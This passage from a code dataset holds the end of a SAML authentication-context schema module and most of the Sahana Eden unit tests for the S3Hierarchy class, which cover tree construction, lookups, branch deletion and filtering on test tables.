'booleanType': BooleanType_,
'ActivationLimitType': ActivationLimitType_,
'ActivationLimitDuration': ActivationLimitDuration,
'ActivationLimitUsages': ActivationLimitUsages,
'ActivationLimitSession': ActivationLimitSession,
'ActivationLimitDurationType': ActivationLimitDurationType_,
'ActivationLimitUsagesType': ActivationLimitUsagesType_,
'ActivationLimitSessionType': ActivationLimitSessionType_,
'LengthType': LengthType_,
'mediumType': MediumType_,
'KeyStorageType': KeyStorageType_,
'SecretKeyProtectionType': SecretKeyProtectionType_,
'SecurityAuditType': SecurityAuditType_,
'ExtensionOnlyType': ExtensionOnlyType_,
'Extension': Extension,
'ExtensionType': ExtensionType_,
'AuthnContextDeclarationBaseType': AuthnContextDeclarationBaseType_,
'AuthnMethodBaseType': AuthnMethodBaseType_,
'PrincipalAuthenticationMechanismType': PrincipalAuthenticationMechanismType_,
'TokenType': TokenType_,
'TimeSyncTokenType': TimeSyncTokenType_,
}
def factory(tag, **kwargs):
    """
    Instantiate the element class registered for *tag* in
    ELEMENT_BY_TAG, forwarding all keyword arguments to its
    constructor.

    Raises KeyError if no class is registered for *tag*.
    """
    element_class = ELEMENT_BY_TAG[tag]
    return element_class(**kwargs)
| apache-2.0 |
anurag-ks/eden | modules/unit_tests/s3/s3hierarchy.py | 14 | 78245 | # -*- coding: utf-8 -*-
#
# S3Hierarchy Unit Tests
#
# To run this script use:
# python web2py.py -S eden -M -R applications/eden/modules/unit_tests/s3/s3hierarchy.py
#
import unittest
from lxml import etree
from s3dal import Field, Query
from s3.s3utils import *
from s3.s3rest import s3_request
from s3 import FS, S3Hierarchy, S3HierarchyFilter, s3_meta_fields
# =============================================================================
class S3HierarchyTests(unittest.TestCase):
    """ Tests for standard hierarchies (parent-field based) """

    # -------------------------------------------------------------------------
    @classmethod
    def setUpClass(cls):

        s3db = current.s3db

        # Self-referential hierarchy table: "parent" links each node to
        # its parent node, "category" classifies nodes per level
        s3db.define_table("test_hierarchy",
                          Field("name"),
                          Field("category"),
                          Field("type"),
                          Field("parent", "reference test_hierarchy"),
                          *s3_meta_fields())

        # Table referencing the hierarchy; ondelete=RESTRICT is used by
        # testDeleteBranchFailure to provoke a deletion cascade failure
        s3db.define_table("test_hierarchy_reference",
                          Field("test_hierarchy_id", "reference test_hierarchy",
                                ondelete = "RESTRICT",
                                ),
                          Field("test_hierarchy_multi_id", "list:reference test_hierarchy"),
                          *s3_meta_fields())

        # Test fixture: two root nodes (HIERARCHY1, HIERARCHY2) with two
        # levels of child nodes beneath each
        xmlstr = """
<s3xml>
    <resource name="test_hierarchy" uuid="HIERARCHY1">
        <data field="name">Type 1</data>
        <data field="category">Cat 0</data>
        <data field="type">A</data>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY1-1">
        <data field="name">Type 1-1</data>
        <data field="category">Cat 1</data>
        <data field="type">C</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1"/>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY1-1-1">
        <data field="name">Type 1-1-1</data>
        <data field="category">Cat 2</data>
        <data field="type">B</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-1"/>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY1-1-2">
        <data field="name">Type 1-1-2</data>
        <data field="category">Cat 2</data>
        <data field="type">A</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-1"/>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY1-2">
        <data field="name">Type 1-2</data>
        <data field="category">Cat 1</data>
        <data field="type">B</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1"/>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY1-2-1">
        <data field="name">Type 1-2-1</data>
        <data field="category">Cat 2</data>
        <data field="type">B</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-2"/>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY1-2-2">
        <data field="name">Type 1-2-2</data>
        <data field="category">Cat 2</data>
        <data field="type">C</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-2"/>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY2">
        <data field="name">Type 2</data>
        <data field="category">Cat 0</data>
        <data field="type">B</data>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY2-1">
        <data field="name">Type 2-1</data>
        <data field="category">Cat 1</data>
        <data field="type">A</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY2"/>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY2-1-1">
        <data field="name">Type 2-1-1</data>
        <data field="category">Cat 2</data>
        <data field="type">C</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY2-1"/>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY2-1-2">
        <data field="name">Type 2-1-2</data>
        <data field="category">Cat 2</data>
        <data field="type">D</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY2-1"/>
    </resource>
</s3xml>"""

        xmltree = etree.ElementTree(etree.fromstring(xmlstr))

        current.auth.override = True
        resource = s3db.resource("test_hierarchy")
        resource.import_xml(xmltree)

        current.db.commit()

    # -------------------------------------------------------------------------
    @classmethod
    def tearDownClass(cls):

        db = current.db
        db.test_hierarchy_reference.drop()
        db.test_hierarchy.drop(mode="cascade")
        current.db.commit()

    # -------------------------------------------------------------------------
    def setUp(self):

        current.auth.override = True

        db = current.db
        if not hasattr(self, "rows"):
            # Cache all undeleted nodes, indexed by uuid (self.rows,
            # self.uids) and by record id (self.ids)
            table = db.test_hierarchy
            rows = db((table.id>0) & (table.deleted != True)).select()
            self.rows = {}
            self.uids = {}
            self.ids = {}
            for row in rows:
                uid = row.uuid
                self.rows[uid] = row
                self.uids[uid] = row.id
                self.ids[row.id] = uid

        # Declare the hierarchy: parent link field + category field
        current.s3db.configure("test_hierarchy",
                               hierarchy=("parent", "category"))

    # -------------------------------------------------------------------------
    def tearDown(self):

        current.auth.override = False

    # -------------------------------------------------------------------------
    def testHierarchyConstruction(self):
        """ Test hierarchy construction """

        uids = self.uids

        assertEqual = self.assertEqual
        assertTrue = self.assertTrue

        h = S3Hierarchy("test_hierarchy")

        # Both fixture roots must be recognized as roots
        roots = h.roots
        assertEqual(len(roots), 2)
        assertTrue(uids["HIERARCHY1"] in roots)
        assertTrue(uids["HIERARCHY2"] in roots)

        # All fixture records must appear as nodes
        nodes = h.nodes
        assertEqual(len(nodes), len(uids))
        assertTrue(all(node_id in nodes for node_id in uids.values()))

    # -------------------------------------------------------------------------
    def testPreprocessCreateNode(self):
        """ Test preprocessing of a create-node request """

        r = s3_request("test", "hierarchy", http="POST")
        parent_node = self.rows["HIERARCHY1"]
        parent_id = parent_node.id

        h = S3Hierarchy("test_hierarchy")
        link = h.preprocess_create_node(r, parent_id)
        # Parent-field hierarchies need no link table entry
        self.assertEqual(link, None)

        assertEqual = self.assertEqual

        post_vars = r.post_vars
        assertEqual(post_vars["parent"], parent_id)

        # The parent field must be preset and hidden in the form
        field = r.table.parent
        assertEqual(field.default, parent_id)
        assertEqual(field.update, parent_id)
        self.assertFalse(field.readable)
        self.assertFalse(field.writable)

    # -------------------------------------------------------------------------
    def testDeleteBranch(self):
        """ Test recursive deletion of a hierarchy branch """

        # Add additional nodes (a new branch HIERARCHY1-3 with 2 children)
        xmlstr = """
<s3xml>
    <resource name="test_hierarchy" uuid="HIERARCHY1-3">
        <data field="name">Type 1-3</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1"/>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY1-3-1">
        <data field="name">Type 1-3-1</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-3"/>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY1-3-2">
        <data field="name">Type 1-3-2</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-3"/>
    </resource>
</s3xml>"""

        xmltree = etree.ElementTree(etree.fromstring(xmlstr))
        resource = current.s3db.resource("test_hierarchy")
        resource.import_xml(xmltree)

        # Commit here, otherwise failing deletion will roll back the import, too
        db = current.db
        db.commit()

        assertTrue = self.assertTrue
        assertFalse = self.assertFalse
        assertEqual = self.assertEqual

        table = db.test_hierarchy
        try:
            # Capture the uuids
            rows = db(table.uuid.like("HIERARCHY1-3%")).select()
            uids = {}
            for row in rows:
                assertFalse(row.deleted)
                uids[row.uuid] = row.id

            # Mark as dirty after import (forces the hierarchy to rebuild)
            h = S3Hierarchy("test_hierarchy")
            h.dirty("test_hierarchy")

            # Verify that branch node has been added to the hierarchy
            branches = h.children(self.uids["HIERARCHY1"])
            assertTrue(uids["HIERARCHY1-3"] in branches)

            # Verify that children have been added, too
            children = h.children(uids["HIERARCHY1-3"])
            assertEqual(len(children), 2)

            # Delete the branch (should cascade to all 3 nodes)
            success = h.delete([uids["HIERARCHY1-3"]])
            assertEqual(success, 3)

            # Verify that branch has been deleted
            branches = h.children(self.uids["HIERARCHY1"])
            assertFalse(uids["HIERARCHY1-3"] in branches)

            # Child nodes must be gone as well
            nodes = h.nodes
            assertTrue(all(uids[uid] not in nodes for uid in uids))

            # Verify that the nodes are (soft-)deleted from database too
            rows = db(table.uuid.like("HIERARCHY1-3%")).select()
            for row in rows:
                assertTrue(row.deleted)
                uids[row.uuid] = row.id
        finally:
            # Cleanup: hard-delete the extra nodes
            db(table.uuid.like("HIERARCHY1-3%")).delete()

    # -------------------------------------------------------------------------
    def testDeleteBranchFailure(self):
        """
            Test proper handling of deletion cascade failure due to
            db integrity constraints
        """

        # Add additional nodes; REF1 references HIERARCHY1-4-1 with
        # ondelete=RESTRICT and thereby blocks the deletion cascade
        xmlstr = """
<s3xml>
    <resource name="test_hierarchy" uuid="HIERARCHY1-4">
        <data field="name">Type 1-4</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1"/>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY1-4-1">
        <data field="name">Type 1-4-1</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-4"/>
    </resource>
    <resource name="test_hierarchy" uuid="HIERARCHY1-4-2">
        <data field="name">Type 1-4-2</data>
        <reference field="parent" resource="test_hierarchy" uuid="HIERARCHY1-4"/>
    </resource>
    <resource name="test_hierarchy_reference" uuid="REF1">
        <reference field="test_hierarchy_id" uuid="HIERARCHY1-4-1"/>
    </resource>
</s3xml>"""

        xmltree = etree.ElementTree(etree.fromstring(xmlstr))

        db = current.db
        s3db = current.s3db

        resource = s3db.resource("test_hierarchy")
        resource.import_xml(xmltree)
        resource = s3db.resource("test_hierarchy_reference")
        resource.import_xml(xmltree)

        # Commit here, otherwise failing deletion will roll back the import, too
        db.commit()

        assertTrue = self.assertTrue
        assertFalse = self.assertFalse
        assertEqual = self.assertEqual

        table = db.test_hierarchy
        try:
            # Capture the uuids
            rows = db(table.uuid.like("HIERARCHY1-4%")).select()
            uids = {}
            for row in rows:
                assertFalse(row.deleted)
                uids[row.uuid] = row.id

            # Mark as dirty after import
            h = S3Hierarchy("test_hierarchy")
            h.dirty("test_hierarchy")

            # Verify that branch node has been added to the hierarchy
            branches = h.children(self.uids["HIERARCHY1"])
            assertTrue(uids["HIERARCHY1-4"] in branches)

            # Verify that children have been added, too
            children = h.children(uids["HIERARCHY1-4"])
            assertEqual(len(children), 2)

            # Try delete the branch => should fail (REF1 blocks it)
            success = h.delete([uids["HIERARCHY1-4"]])
            assertEqual(success, None)

            # Verify that branch has not been deleted
            branches = h.children(self.uids["HIERARCHY1"])
            assertTrue(uids["HIERARCHY1-4"] in branches)

            # Child nodes must still be in the hierarchy
            nodes = h.nodes
            assertTrue(all(uids[uid] in nodes for uid in uids))

            # Verify that the nodes are not deleted from database either
            rows = db(table.uuid.like("HIERARCHY1-4%")).select()
            for row in rows:
                assertFalse(row.deleted)

            # Remove the blocker
            db(db.test_hierarchy_reference.uuid == "REF1").delete()

            # Try again to delete the branch => should succeed now
            success = h.delete([uids["HIERARCHY1-4"]])
            assertEqual(success, 3)

            # Verify that branch has been deleted
            branches = h.children(self.uids["HIERARCHY1"])
            assertFalse(uids["HIERARCHY1-4"] in branches)

            # Child nodes must be gone as well
            nodes = h.nodes
            assertTrue(all(uids[uid] not in nodes for uid in uids))

            # Verify that the nodes are deleted from database too
            rows = db(table.uuid.like("HIERARCHY1-4%")).select()
            for row in rows:
                assertTrue(row.deleted)
                uids[row.uuid] = row.id
        finally:
            # Cleanup: hard-delete the extra nodes
            db(table.uuid.like("HIERARCHY1-4%")).delete()

    # -------------------------------------------------------------------------
    def testCategory(self):
        """ Test node category lookup """

        uids = self.uids
        rows = self.rows
        assertEqual = self.assertEqual

        h = S3Hierarchy("test_hierarchy")
        for uid in uids:
            category = h.category(uids[uid])
            assertEqual(category, rows[uid].category)

    # -------------------------------------------------------------------------
    def testParent(self):
        """ Test parent lookup """

        ids = self.ids
        uids = self.uids
        rows = self.rows
        assertEqual = self.assertEqual

        h = S3Hierarchy("test_hierarchy")
        for uid in uids:
            # classify=True additionally returns the parent's category
            parent, category = h.parent(uids[uid], classify=True)
            assertEqual(parent, rows[uid].parent)
            if parent:
                parent_uid = ids[parent]
                assertEqual(category, rows[parent_uid].category)

    # -------------------------------------------------------------------------
    def testChildren(self):
        """ Test child node lookup """

        uids = self.uids
        rows = self.rows
        assertEqual = self.assertEqual

        h = S3Hierarchy("test_hierarchy")
        for uid in uids:
            # Expected children: all cached rows whose parent is this node
            assertEqual(h.children(uids[uid]),
                        set(row.id for row in rows.values()
                            if row.parent == uids[uid]))

    # -------------------------------------------------------------------------
    def testPath(self):
        """ Test node path lookup """

        uids = self.uids
        rows = self.rows
        assertEqual = self.assertEqual

        # Standard path from root
        node = uids["HIERARCHY2-1-2"]
        h = S3Hierarchy("test_hierarchy")
        path = h.path(node)
        assertEqual(path, [uids["HIERARCHY2"],
                           uids["HIERARCHY2-1"],
                           uids["HIERARCHY2-1-2"]
                           ])

        # Path from category root (path starts at the first "Cat 1" ancestor)
        node = uids["HIERARCHY1-1-1"]
        path = h.path(node, category="Cat 1", classify=True)
        classified = lambda uid: (uids[uid], rows[uid].category)
        assertEqual(path, [classified("HIERARCHY1-1"),
                           classified("HIERARCHY1-1-1"),
                           ])

        # Path of root
        node = uids["HIERARCHY2"]
        path = h.path(node, category="Cat 1", classify=True)
        classified = lambda uid: (uids[uid], rows[uid].category)
        assertEqual(path, [classified("HIERARCHY2")])

    # -------------------------------------------------------------------------
    def testRoot(self):
        """ Test root node lookup """

        uids = self.uids
        rows = self.rows
        assertEqual = self.assertEqual

        # Top root
        node = uids["HIERARCHY1-1-1"]
        h = S3Hierarchy("test_hierarchy")
        root = h.root(node)
        assertEqual(root, uids["HIERARCHY1"])

        # Root by category (classify=True returns an (id, category) tuple)
        node = uids["HIERARCHY2-1"]
        root = h.root(node, classify=True)
        assertEqual(root, (uids["HIERARCHY2"], rows["HIERARCHY2"].category))

        # Root of root (a root node is its own root)
        node = uids["HIERARCHY1"]
        root = h.root(node)
        assertEqual(root, uids["HIERARCHY1"])

        # None
        root = h.root(None)
        assertEqual(root, None)

    # -------------------------------------------------------------------------
    def testDepth(self):
        """ Test determination of the maximum depth beneath a node """

        uids = self.uids
        rows = self.rows
        assertEqual = self.assertEqual

        h = S3Hierarchy("test_hierarchy")

        # Top root
        node = uids["HIERARCHY1"]
        assertEqual(h.depth(node), 2)

        # Sub-node
        node = uids["HIERARCHY2-1"]
        assertEqual(h.depth(node), 1)

        # Leaf
        node = uids["HIERARCHY1-1-1"]
        assertEqual(h.depth(node), 0)

        # None (processes all roots)
        assertEqual(h.depth(None), 2)

    # -------------------------------------------------------------------------
    def testSiblings(self):
        """ Test lookup of sibling nodes """

        uids = self.uids
        rows = self.rows
        assertEqual = self.assertEqual

        h = S3Hierarchy("test_hierarchy")
        for uid in uids:
            parent = rows[uid].parent
            # Expected siblings: all nodes sharing the same parent
            siblings = set(row.id for row in rows.values()
                           if row.parent == parent)
            assertEqual(h.siblings(uids[uid], inclusive=True), siblings)
            siblings.discard(uids[uid])
            assertEqual(h.siblings(uids[uid], inclusive=False), siblings)

    # -------------------------------------------------------------------------
    def testFindAll(self):
        """ Test lookup of descendant nodes """

        uids = self.uids

        h = S3Hierarchy("test_hierarchy")
        assertEqual = self.assertEqual

        # All descendants, excluding the start node itself
        root = uids["HIERARCHY1"]
        nodes = h.findall(root)
        expected = ["HIERARCHY1-1",
                    "HIERARCHY1-1-1",
                    "HIERARCHY1-1-2",
                    "HIERARCHY1-2",
                    "HIERARCHY1-2-1",
                    "HIERARCHY1-2-2",
                    ]
        assertEqual(nodes, set(uids[uid] for uid in expected))

        # inclusive=True also includes the start node
        root = uids["HIERARCHY1"]
        nodes = h.findall(root, inclusive=True)
        expected = ["HIERARCHY1",
                    "HIERARCHY1-1",
                    "HIERARCHY1-1-1",
                    "HIERARCHY1-1-2",
                    "HIERARCHY1-2",
                    "HIERARCHY1-2-1",
                    "HIERARCHY1-2-2",
                    ]
        assertEqual(nodes, set(uids[uid] for uid in expected))

        # Restricted to a category
        root = uids["HIERARCHY2"]
        nodes = h.findall(root, category="Cat 1")
        expected = ["HIERARCHY2-1",
                    ]
        assertEqual(nodes, set(uids[uid] for uid in expected))

        # Non-existent category gives an empty set
        root = uids["HIERARCHY1"]
        nodes = h.findall(root, category="Cat 4")
        assertEqual(nodes, set())

    # -------------------------------------------------------------------------
    def testExportNode(self):
        """ Test export of nodes """

        assertEqual = self.assertEqual
        assertTrue = self.assertTrue
        assertFalse = self.assertFalse

        h = S3Hierarchy("test_hierarchy")
        data = dict((self.uids[uid], self.rows[uid]) for uid in self.uids)

        # Export the rows beneath node HIERARCHY1
        root = self.uids["HIERARCHY1"]
        output = h.export_node(root,
                               depth=2,
                               prefix="_export",
                               data=data,
                               hcol = "test_hierarchy.name",
                               columns=["test_hierarchy.category"],
                               )

        # Should give 7 rows (HIERARCHY1 and its 6 descendants)
        assertEqual(len(output), 7)

        for row in output:
            next_level = True
            for i in xrange(2):
                hcol = "_export.%s" % i
                # All hierarchy columns must be present
                assertTrue(hcol in row)
                label = row[hcol]
                # The row should belong to this branch
                if label != "" and next_level:
                    assertEqual(label[:6], "Type 1")
                else:
                    # Levels below the last level must be empty
                    next_level = False
                    assertEqual(label, "")
            # The hcol itself is replaced by the per-level columns
            assertTrue("test_hierarchy.category" in row)
            assertFalse("test_hierarchy.name" in row)

    # -------------------------------------------------------------------------
    def testFilteringLeafOnly(self):
        """ Test filtering of the tree with leafonly=True """

        uids = self.uids

        assertEqual = self.assertEqual
        assertTrue = self.assertTrue

        # With leafonly=True only leaves matching the filter (and their
        # ancestors) remain in the tree
        h = S3Hierarchy("test_hierarchy",
                        filter = FS("type") == "D",
                        leafonly = True)

        # Check nodes
        nodes = h.nodes
        expected = ["HIERARCHY2",
                    "HIERARCHY2-1",
                    "HIERARCHY2-1-2"]
        assertEqual(len(nodes), len(expected))
        assertTrue(all(uids[uid] in nodes for uid in expected))

        # Check consistency: every child/parent link stays inside the tree
        for node in nodes.values():
            assertTrue(all(child_id in nodes for child_id in node["s"]))
            parent_id = node["p"]
            if parent_id:
                assertTrue(parent_id in nodes)

    # -------------------------------------------------------------------------
    def testFilteringAnyNode(self):
        """ Test filtering of the tree with leafonly=False """

        uids = self.uids

        # With leafonly=False any matching node (and its ancestors) remains
        h = S3Hierarchy("test_hierarchy",
                        filter = FS("type") == "C",
                        leafonly = False)

        assertEqual = self.assertEqual
        assertTrue = self.assertTrue

        # Check nodes
        nodes = h.nodes
        expected = ["HIERARCHY1",
                    "HIERARCHY1-1",
                    "HIERARCHY1-2",
                    "HIERARCHY1-2-2",
                    "HIERARCHY2",
                    "HIERARCHY2-1",
                    "HIERARCHY2-1-1"]
        assertEqual(len(nodes), len(expected))
        assertTrue(all(uids[uid] in nodes for uid in expected))

        # Check consistency: every child/parent link stays inside the tree
        for node in nodes.values():
            assertTrue(all(child_id in nodes for child_id in node["s"]))
            parent_id = node["p"]
            if parent_id:
                assertTrue(parent_id in nodes)
# =============================================================================
class S3LinkedHierarchyTests(unittest.TestCase):
    """ Tests for linktable-based hierarchies """

    # -------------------------------------------------------------------------
    @classmethod
    def setUpClass(cls):

        s3db = current.s3db

        # Node table (no parent field - parent/child links live in the
        # separate link table below)
        s3db.define_table("test_lhierarchy",
                          Field("name"),
                          Field("category"),
                          Field("type"),
                          *s3_meta_fields())

        # Link table connecting child nodes to their parent nodes
        s3db.define_table("test_lhierarchy_link",
                          Field("parent_id", "reference test_lhierarchy"),
                          Field("child_id", "reference test_lhierarchy"),
                          *s3_meta_fields())

        # Component for import
        # NOTE: removed a stray trailing comma after this call which
        # turned the statement into a discarded 1-tuple expression
        s3db.add_components("test_lhierarchy",
                            test_lhierarchy = {"name": "parent",
                                               "link": "test_lhierarchy_link",
                                               "joinby": "child_id",
                                               "key": "parent_id",
                                               },
                            )

        # Test fixture: same tree shape as in S3HierarchyTests, but with
        # parent links expressed through nested link table resources
        xmlstr = """
<s3xml>
    <resource name="test_lhierarchy" uuid="LHIERARCHY1">
        <data field="name">Type 1</data>
        <data field="category">Cat 0</data>
        <data field="type">A</data>
    </resource>
    <resource name="test_lhierarchy" uuid="LHIERARCHY1-1">
        <data field="name">Type 1-1</data>
        <data field="category">Cat 1</data>
        <data field="type">C</data>
        <resource name="test_lhierarchy_link">
            <reference field="parent_id"
                       resource="test_lhierarchy" uuid="LHIERARCHY1"/>
        </resource>
    </resource>
    <resource name="test_lhierarchy" uuid="LHIERARCHY1-1-1">
        <data field="name">Type 1-1-1</data>
        <data field="category">Cat 2</data>
        <data field="type">B</data>
        <resource name="test_lhierarchy_link">
            <reference field="parent_id"
                       resource="test_lhierarchy" uuid="LHIERARCHY1-1"/>
        </resource>
    </resource>
    <resource name="test_lhierarchy" uuid="LHIERARCHY1-1-2">
        <data field="name">Type 1-1-2</data>
        <data field="category">Cat 2</data>
        <data field="type">A</data>
        <resource name="test_lhierarchy_link">
            <reference field="parent_id"
                       resource="test_lhierarchy" uuid="LHIERARCHY1-1"/>
        </resource>
    </resource>
    <resource name="test_lhierarchy" uuid="LHIERARCHY1-2">
        <data field="name">Type 1-2</data>
        <data field="category">Cat 1</data>
        <data field="type">B</data>
        <resource name="test_lhierarchy_link">
            <reference field="parent_id"
                       resource="test_lhierarchy" uuid="LHIERARCHY1"/>
        </resource>
    </resource>
    <resource name="test_lhierarchy" uuid="LHIERARCHY1-2-1">
        <data field="name">Type 1-2-1</data>
        <data field="category">Cat 2</data>
        <data field="type">B</data>
        <resource name="test_lhierarchy_link">
            <reference field="parent_id"
                       resource="test_lhierarchy" uuid="LHIERARCHY1-2"/>
        </resource>
    </resource>
    <resource name="test_lhierarchy" uuid="LHIERARCHY1-2-2">
        <data field="name">Type 1-2-2</data>
        <data field="category">Cat 2</data>
        <data field="type">C</data>
        <resource name="test_lhierarchy_link">
            <reference field="parent_id"
                       resource="test_lhierarchy" uuid="LHIERARCHY1-2"/>
        </resource>
    </resource>
    <resource name="test_lhierarchy" uuid="LHIERARCHY2">
        <data field="name">Type 2</data>
        <data field="category">Cat 0</data>
        <data field="type">B</data>
    </resource>
    <resource name="test_lhierarchy" uuid="LHIERARCHY2-1">
        <data field="name">Type 2-1</data>
        <data field="category">Cat 1</data>
        <data field="type">A</data>
        <resource name="test_lhierarchy_link">
            <reference field="parent_id"
                       resource="test_lhierarchy" uuid="LHIERARCHY2"/>
        </resource>
    </resource>
    <resource name="test_lhierarchy" uuid="LHIERARCHY2-1-1">
        <data field="name">Type 2-1-1</data>
        <data field="category">Cat 2</data>
        <data field="type">C</data>
        <resource name="test_lhierarchy_link">
            <reference field="parent_id"
                       resource="test_lhierarchy" uuid="LHIERARCHY2-1"/>
        </resource>
    </resource>
    <resource name="test_lhierarchy" uuid="LHIERARCHY2-1-2">
        <data field="name">Type 2-1-2</data>
        <data field="category">Cat 2</data>
        <data field="type">D</data>
        <resource name="test_lhierarchy_link">
            <reference field="parent_id"
                       resource="test_lhierarchy" uuid="LHIERARCHY2-1"/>
        </resource>
    </resource>
</s3xml>"""

        xmltree = etree.ElementTree(etree.fromstring(xmlstr))

        current.auth.override = True
        resource = s3db.resource("test_lhierarchy")
        resource.import_xml(xmltree)

    # -------------------------------------------------------------------------
    @classmethod
    def tearDownClass(cls):

        db = current.db
        db.test_lhierarchy_link.drop()
        db.test_lhierarchy.drop()

    # -------------------------------------------------------------------------
    def setUp(self):

        current.auth.override = True

        db = current.db
        if not hasattr(self, "rows"):
            # Cache all nodes with their link table rows, indexed by uuid
            # (self.rows, self.links, self.uids) and by record id (self.ids)
            table = db.test_lhierarchy
            linktable = db.test_lhierarchy_link
            left = linktable.on(linktable.child_id == table.id)
            rows = db(db.test_lhierarchy.id>0).select(table.id,
                                                      table.uuid,
                                                      table.category,
                                                      linktable.child_id,
                                                      linktable.parent_id,
                                                      left=left)
            self.rows = {}
            self.links = {}
            self.uids = {}
            self.ids = {}
            for row in rows:
                record = row.test_lhierarchy
                uid = record.uuid
                self.rows[uid] = record
                self.links[uid] = row.test_lhierarchy_link
                self.uids[uid] = record.id
                self.ids[record.id] = uid

        # Declare the hierarchy: link table key path + category field
        current.s3db.configure("test_lhierarchy",
                               hierarchy=("child_id:test_lhierarchy_link.parent_id",
                                          "category"))

    # -------------------------------------------------------------------------
    def tearDown(self):

        current.auth.override = False

    # -------------------------------------------------------------------------
    def testHierarchyConstruction(self):
        """ Test hierarchy construction """

        uids = self.uids

        h = S3Hierarchy("test_lhierarchy")

        assertEqual = self.assertEqual
        assertTrue = self.assertTrue

        # Both fixture roots must be recognized as roots
        roots = h.roots
        assertEqual(len(roots), 2)
        assertTrue(uids["LHIERARCHY1"] in roots)
        assertTrue(uids["LHIERARCHY2"] in roots)

        # All fixture records must appear as nodes
        nodes = h.nodes
        assertEqual(len(nodes), len(uids))
        assertTrue(all(node_id in nodes for node_id in uids.values()))

    # -------------------------------------------------------------------------
    def testPreprocessCreateNode(self):
        """ Test preprocessing of a create-node request """

        r = s3_request("test", "lhierarchy", http="POST")
        parent_node = self.rows["LHIERARCHY1"]

        h = S3Hierarchy("test_lhierarchy")
        link = h.preprocess_create_node(r, parent_node.id)

        # Linktable hierarchies must return a link descriptor for
        # postprocess_create_node
        self.assertNotEqual(link, None)

        assertEqual = self.assertEqual
        assertEqual(link["linktable"], "test_lhierarchy_link")
        assertEqual(link["lkey"], "child_id")
        assertEqual(link["rkey"], "parent_id")
        assertEqual(link["parent_id"], parent_node.id)

    # -------------------------------------------------------------------------
    def testPostprocessCreateNode(self):
        """ Test postprocessing of a create-node request """

        r = s3_request("test", "lhierarchy", http="POST")
        parent_node = self.rows["LHIERARCHY1"]

        h = S3Hierarchy("test_lhierarchy")
        link = h.preprocess_create_node(r, parent_node.id)

        row = None
        record_id = None

        db = current.db
        table = db.test_lhierarchy
        linktable = db.test_lhierarchy_link
        try:
            # Create a new node and postprocess => must create the link
            record = {"uuid": "LHIERARCHYNEW", "name": "NewNode"}
            record_id = table.insert(**record)
            record["id"] = record_id
            h.postprocess_create_node(link, record)

            query = (linktable.parent_id == parent_node.id) & \
                    (linktable.child_id == record_id)
            row = db(query).select(linktable.id, limitby=(0, 1)).first()
            self.assertNotEqual(row, None)
        finally:
            # Cleanup: remove the link and the new node
            if row:
                row.delete_record()
            if record_id:
                db(table.id == record_id).delete()

    # -------------------------------------------------------------------------
    def testCategory(self):
        """ Test node category lookup """

        uids = self.uids
        rows = self.rows
        assertEqual = self.assertEqual

        h = S3Hierarchy("test_lhierarchy")
        for uid in uids:
            category = h.category(uids[uid])
            assertEqual(category, rows[uid].category)

    # -------------------------------------------------------------------------
    def testParent(self):
        """ Test parent lookup """

        uids = self.uids
        rows = self.rows
        links = self.links
        assertEqual = self.assertEqual

        h = S3Hierarchy("test_lhierarchy")
        for uid in uids:
            # classify=True additionally returns the parent's category
            parent, category = h.parent(uids[uid], classify=True)
            assertEqual(parent, links[uid].parent_id)
            if parent:
                parent_uid = self.ids[parent]
                assertEqual(category, rows[parent_uid].category)

    # -------------------------------------------------------------------------
    def testChildren(self):
        """ Test child node lookup """

        uids = self.uids
        links = self.links
        assertEqual = self.assertEqual

        h = S3Hierarchy("test_lhierarchy")
        for uid in uids:
            # Expected children: all link rows pointing at this parent
            assertEqual(h.children(uids[uid]),
                        set(link.child_id for link in links.values()
                            if link.parent_id == uids[uid]))

    # -------------------------------------------------------------------------
    def testPath(self):
        """ Test node path lookup """

        uids = self.uids
        rows = self.rows
        assertEqual = self.assertEqual

        # Standard path from root
        node = uids["LHIERARCHY2-1-2"]
        h = S3Hierarchy("test_lhierarchy")
        path = h.path(node)
        assertEqual(path, [uids["LHIERARCHY2"],
                           uids["LHIERARCHY2-1"],
                           uids["LHIERARCHY2-1-2"]
                           ])

        # Path from category root (path starts at the first "Cat 1" ancestor)
        node = uids["LHIERARCHY1-1-1"]
        path = h.path(node, category="Cat 1", classify=True)
        classified = lambda uid: (uids[uid], rows[uid].category)
        assertEqual(path, [classified("LHIERARCHY1-1"),
                           classified("LHIERARCHY1-1-1"),
                           ])

        # Path of root
        node = uids["LHIERARCHY2"]
        path = h.path(node, category="Cat 1", classify=True)
        classified = lambda uid: (uids[uid], rows[uid].category)
        assertEqual(path, [classified("LHIERARCHY2")])

    # -------------------------------------------------------------------------
    def testRoot(self):
        """ Test root node lookup """

        uids = self.uids
        rows = self.rows
        assertEqual = self.assertEqual

        # Top root
        node = uids["LHIERARCHY1-1-1"]
        h = S3Hierarchy("test_lhierarchy")
        root = h.root(node)
        assertEqual(root, uids["LHIERARCHY1"])

        # Root by category (classify=True returns an (id, category) tuple)
